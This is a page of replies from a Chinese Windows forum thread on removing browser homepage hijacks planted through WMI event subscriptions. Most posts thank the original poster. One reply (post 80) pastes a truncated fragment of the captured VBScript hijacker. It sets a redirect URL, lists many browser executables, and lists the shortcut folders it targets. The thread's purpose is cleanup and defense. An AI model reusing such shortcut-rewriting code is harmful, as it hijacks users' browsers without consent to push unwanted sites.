远景论坛 - 微软极客社区 › 论坛 › 全新 Windows 论坛 - 微软全新一代操作系统 › Windows 10 论坛 > 抓“虫”---主页被WMI方法劫持的解救方法和工具

1 2 345 6 7 8 9 10 ... 14 下一页

楼主: Wayne_cen

[技术] 抓“虫”---主页被WMI方法劫持的解救方法和工具 [复制链接]
电梯直达
复制

zykm

Rank: 5 Rank: 5 Rank: 5

UID: 731959
帖子: 765
PB币: 9384
贡献: 0
技术: 10
活跃: 1591

61^F

发表于 2017-3-8 22:02:48 IP属地广东 |只看该作者

办公室跟家里的电脑都被劫持过

kdst

Rank: 2 Rank: 2

UID: 1165067
帖子: 176
PB币: 183
贡献: 0
技术: 0
活跃: 494

62^F

发表于 2017-3-8 23:13:58 IP属地广东 |只看该作者

终于看到解决办法了

玄风残翼

Rank: 7 Rank: 7 Rank: 7

UID: 60921
帖子: 1365
PB币: 2672
贡献: 0
技术: 4
活跃: 1819

63^F

发表于 2017-3-9 07:05:23 IP属地浙江 |只看该作者

cjy__05 发表于 2017-3-1 17:35
网吧很多电脑也是主页被改非常顽固不知道是不是这种方式

网吧里不用这么弱的方法。网吧里都是用Rootkit，就是一种合法病毒。

菠萝油王子lyg

Rank: 2 Rank: 2

UID: 993714
帖子: 196
PB币: 28
贡献: 0
技术: 0
活跃: 746

64^F

发表于 2017-3-9 14:09:13 IP属地广东 |只看该作者

谢谢分享！

aqyh aqyh 当前离线积分 1256 最后登录 2024-1-28 精华 0 阅读权限 0 主题 45 UID 4805881 帖子 2465 PB币 1446 威望 45 贡献 0 技术 0 活跃 527 发消息头像被屏蔽 UID 4805881 帖子 2465 PB币 1446 贡献 0 技术 0 活跃 527 串个门加好友打招呼发消息	65^F 发表于 2017-3-9 15:14:32 IP属地江苏 \|只看该作者提示: 作者被禁止或删除内容自动屏蔽

prophet

Rank: 1

UID: 374968
帖子: 82
PB币: 351
贡献: 0
技术: 0
活跃: 164

66^F

发表于 2017-3-11 19:53:03 IP属地重庆 |只看该作者

标记一下，以备日后使用，谢谢分享

ufoqqq

Rank: 5 Rank: 5 Rank: 5

UID: 149917
帖子: 1045
PB币: 2299
贡献: 0
技术: 0
活跃: 670

67^F

发表于 2017-3-11 20:05:18 IP属地香港 |只看该作者

感谢分享!收藏备用。

黯然小混

小猪哥

Rank: 7 Rank: 7 Rank: 7

UID: 128865
帖子: 2345
PB币: 3847
贡献: 0
技术: 9
活跃: 3076

68^F

发表于 2017-3-12 23:29:37 IP属地广东 |只看该作者

在WMI Event Registration Editor 中，注册了一个VBSScriptLKKDS_filter脚本事件这个看不懂，怎么弄出来的，楼主？？

jjww2002

Rank: 5 Rank: 5 Rank: 5

UID: 1129618
帖子: 560
PB币: 3052
贡献: 0
技术: 0
活跃: 1183

69^F

发表于 2017-3-20 09:52:27 IP属地浙江 |只看该作者

Wayne_cen 发表于 2017-3-2 11:58
运营商都是DNS劫持，我只听过，没遇到过。

嗯，无缘无故跳出来的广告窗口，应该就是

zhengping410

Rank: 5 Rank: 5 Rank: 5

UID: 1095963
帖子: 407
PB币: 1835
贡献: 0
技术: 0
活跃: 439

70^F

发表于 2017-3-20 21:07:26 IP属地安徽 |只看该作者

感谢楼主分享！收藏备用。

xiao911

Rank: 2 Rank: 2

UID: 4329620
帖子: 199
PB币: 737
贡献: 0
技术: 0
活跃: 790

71^F

发表于 2017-3-20 22:19:19 IP属地四川 |只看该作者

这个刚好用得着，谢谢分享

txyc

Rank: 2 Rank: 2

UID: 4811928
帖子: 239
PB币: 250
贡献: 0
技术: 0
活跃: 203

72^F

发表于 2017-3-22 09:45:58 IP属地浙江来自手机 |只看该作者

写得比较详细，点赞！这个方法的确是对于浏览器老是被劫持，又不知问题出在那里的一种好教程！非常感谢

1009129973

Rank: 2 Rank: 2

UID: 3131758
帖子: 281
PB币: 397
贡献: 0
技术: 0
活跃: 1224

73^F

发表于 2017-3-22 10:17:12 IP属地北京 |只看该作者

十分感谢楼主，之前试过很多方法，都没有用

gl2525

Rank: 7 Rank: 7 Rank: 7

UID: 1037448
帖子: 1178
PB币: 1581
贡献: 0
技术: 0
活跃: 2912

74^F

发表于 2017-3-22 10:41:47 IP属地江苏 |只看该作者

hao123是比较恶心的

hack930

Rank: 2 Rank: 2

UID: 2406535
帖子: 424
PB币: 75
贡献: 0
技术: 0
活跃: 803

75^F

发表于 2017-3-22 10:42:59 IP属地江苏 |只看该作者

谢谢。这种过程可以让后来者，借鉴

1009129973

Rank: 2 Rank: 2

UID: 3131758
帖子: 281
PB币: 397
贡献: 0
技术: 0
活跃: 1224

76^F

发表于 2017-3-22 10:45:08 IP属地北京 |只看该作者

已经成功删除，再次感谢，么么哒

ginoxp

Rank: 1

UID: 695712
帖子: 94
PB币: 0
贡献: 0
技术: 0
活跃: 127

77^F

发表于 2017-3-22 10:54:07 IP属地北京 |只看该作者

cha ge biao ji!~~~

rgcjh

Rank: 7 Rank: 7 Rank: 7

UID: 38032
帖子: 2340
PB币: 9361
贡献: 0
技术: 7
活跃: 2761

78^F

发表于 2017-3-22 11:51:49 IP属地江苏 |只看该作者

1这是高手啊

tiansi78

Rank: 2 Rank: 2

UID: 943100
帖子: 195
PB币: 143
贡献: 0
技术: 0
活跃: 1934

79^F

发表于 2017-3-22 21:44:11 IP属地广西 |只看该作者

非常感谢，按照你提供的方法，我也捉到了“虫”

kfc0013

氺氺

Rank: 15

UID: 3805006
帖子: 16105
PB币: 7
贡献: 0
技术: 81
活跃: 15215

80^F

发表于 2017-3-23 13:24:13 IP属地江西 |只看该作者

On Error Resume Next:Const link = "http://hao642.com/?r=gameall&m=c37":Const link360 = "http://hao642.com/?r=gameall&m=c37&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\kfc\Desktop,C:\Users\kfc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\kfc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\kfc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\kfc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LC

复制代码

抓到了一个，谢谢！

1 2 345 6 7 8 9 10 ... 14 下一页

返回列表发表新帖

[技术] 抓“虫”---主页被WMI方法劫持的解救方法和工具 [复制链接]
电梯直达
复制

7周年庆典勋章

8周年庆典勋章

Win10先驱者

小白鼠勋章II代

远景美化达人

[技术] 抓“虫”---主页被WMI方法劫持的解救方法和工具 [复制链接] 电梯直达 复制

7周年庆典勋章

8周年庆典勋章

Win10先驱者

小白鼠勋章II代

远景美化达人

[技术] 抓“虫”---主页被WMI方法劫持的解救方法和工具 [复制链接]
电梯直达
复制